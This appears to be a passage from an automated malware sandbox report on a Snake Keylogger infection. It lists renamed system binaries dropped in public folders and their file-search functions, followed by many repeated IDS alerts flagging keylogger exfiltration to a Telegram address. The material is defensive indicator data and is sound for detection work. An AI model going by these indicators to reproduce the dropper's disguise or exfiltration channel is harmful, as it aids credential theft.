              Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1465791907.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1470977264.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1490885781.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1484636216.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1493486457.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1492312116.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1496642334.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1494741450.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.3.dr
              Source: Binary string: certutil.pdb source: kn.exe, 00000007.00000000.1471597989.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1483116865.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1485238233.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1489880503.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
              Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1465791907.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.1470505070.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.1484029238.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.1470977264.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.1490885781.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.1484636216.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000002.1493486457.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000B.00000000.1492312116.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000002.1496642334.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000C.00000000.1494741450.00007FF7AB152000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.3.dr
              Source: Binary string: easinvoker.pdbGCTL source: spoolsv.COM, 0000000A.00000002.1610085610.0000000020730000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1576101598.00000000217D2000.00000004.00000020.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1614240793.000000007F450000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000002.1610085610.0000000020750000.00000004.00001000.00020000.00000000.sdmp, spoolsv.COM, 0000000A.00000003.1576101598.0000000021801000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.00000000207E3000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1700896503.000000000057D000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000003.1700896503.00000000005AC000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000012.00000002.1740602050.00000000207D0000.00000004.00001000.00020000.00000000.sdmp, Cneehezx.PIF, 00000017.00000003.1776083629.0000000000765000.00000004.00000020.00020000.00000000.sdmp, Cneehezx.PIF, 00000017.00000003.1776083629.0000000000736000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000007.00000000.1471597989.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000002.1483116865.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1485238233.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1489880503.00007FF792E0E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.dr
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB13823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF7AB13823C
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB132978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,4_2_00007FF7AB132978
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB147B4C FindFirstFileW,FindNextFileW,FindClose,4_2_00007FF7AB147B4C
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB121560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_00007FF7AB121560
              Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7AB1235B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,4_2_00007FF7AB1235B8
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB13823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,6_2_00007FF7AB13823C
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB132978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,6_2_00007FF7AB132978
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB147B4C FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF7AB147B4C
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB121560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,6_2_00007FF7AB121560
              Source: C:\Users\Public\alpha.exeCode function: 6_2_00007FF7AB1235B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,6_2_00007FF7AB1235B8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,7_2_00007FF792D7B3D8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,7_2_00007FF792D7D4A4
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D3D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,7_2_00007FF792D3D440
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DB3674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,7_2_00007FF792DB3674
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D7DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,7_2_00007FF792D7DBC0
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DD19F8 #359,FindFirstFileW,FindNextFileW,FindClose,7_2_00007FF792DD19F8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DD1B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,7_2_00007FF792DD1B04
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D75E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,7_2_00007FF792D75E58
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DD234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,7_2_00007FF792DD234C
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792D6C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,7_2_00007FF792D6C6F8
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DD6F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,7_2_00007FF792DD6F80
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DD3100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF792DD3100
              Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF792DD10C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,7_2_00007FF792DD10C4
              Source: C:\Users\Public\Libraries\spoolsv.COMCode function: 10_2_028F58B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,10_2_028F58B4
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB13823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,11_2_00007FF7AB13823C
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB132978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,11_2_00007FF7AB132978
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB147B4C FindFirstFileW,FindNextFileW,FindClose,11_2_00007FF7AB147B4C
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB121560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,11_2_00007FF7AB121560
              Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7AB1235B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,11_2_00007FF7AB1235B8
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB13823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,12_2_00007FF7AB13823C
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB132978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,12_2_00007FF7AB132978
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB147B4C FindFirstFileW,FindNextFileW,FindClose,12_2_00007FF7AB147B4C
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB121560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,12_2_00007FF7AB121560
              Source: C:\Users\Public\alpha.exeCode function: 12_2_00007FF7AB1235B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,12_2_00007FF7AB1235B8

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49746 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49721 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49734 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49723 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49717 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49728 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49712 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49735 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49722 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49724 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49758 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49714 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49725 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49751 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49718 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49730 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49726 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49760 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49720 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49737 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49755 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49729 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49745 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49742 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49743 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49740 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49719 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49736 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49733 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49750 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49756 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49744 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49754 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49806 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49753 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49795 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49824 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49845 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49767 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49731 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49727 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49748 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49747 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49774 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49739 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49752 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49782 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49831 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49865 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49781 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49759 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49783 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49840 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49764 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49798 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49872 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49749 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49862 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49761 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49716 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49765 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49775 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49757 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49898 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49812 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49848 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49803 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49814 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49790 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49914 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49895 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49913 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49922 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49732 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49900 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49820 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49832 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49741 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49823 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49889 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49890 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49847 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49839 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49939 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49857 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49906 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49763 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49815 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49766 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49807 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49930 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49864 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49804 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49878 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49881 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49882 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49873 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49773 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49856 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49796 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49887 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49879 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49897 -> 149.154.167.220:443
              Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.8:49849 -> 149.154.167.220:443
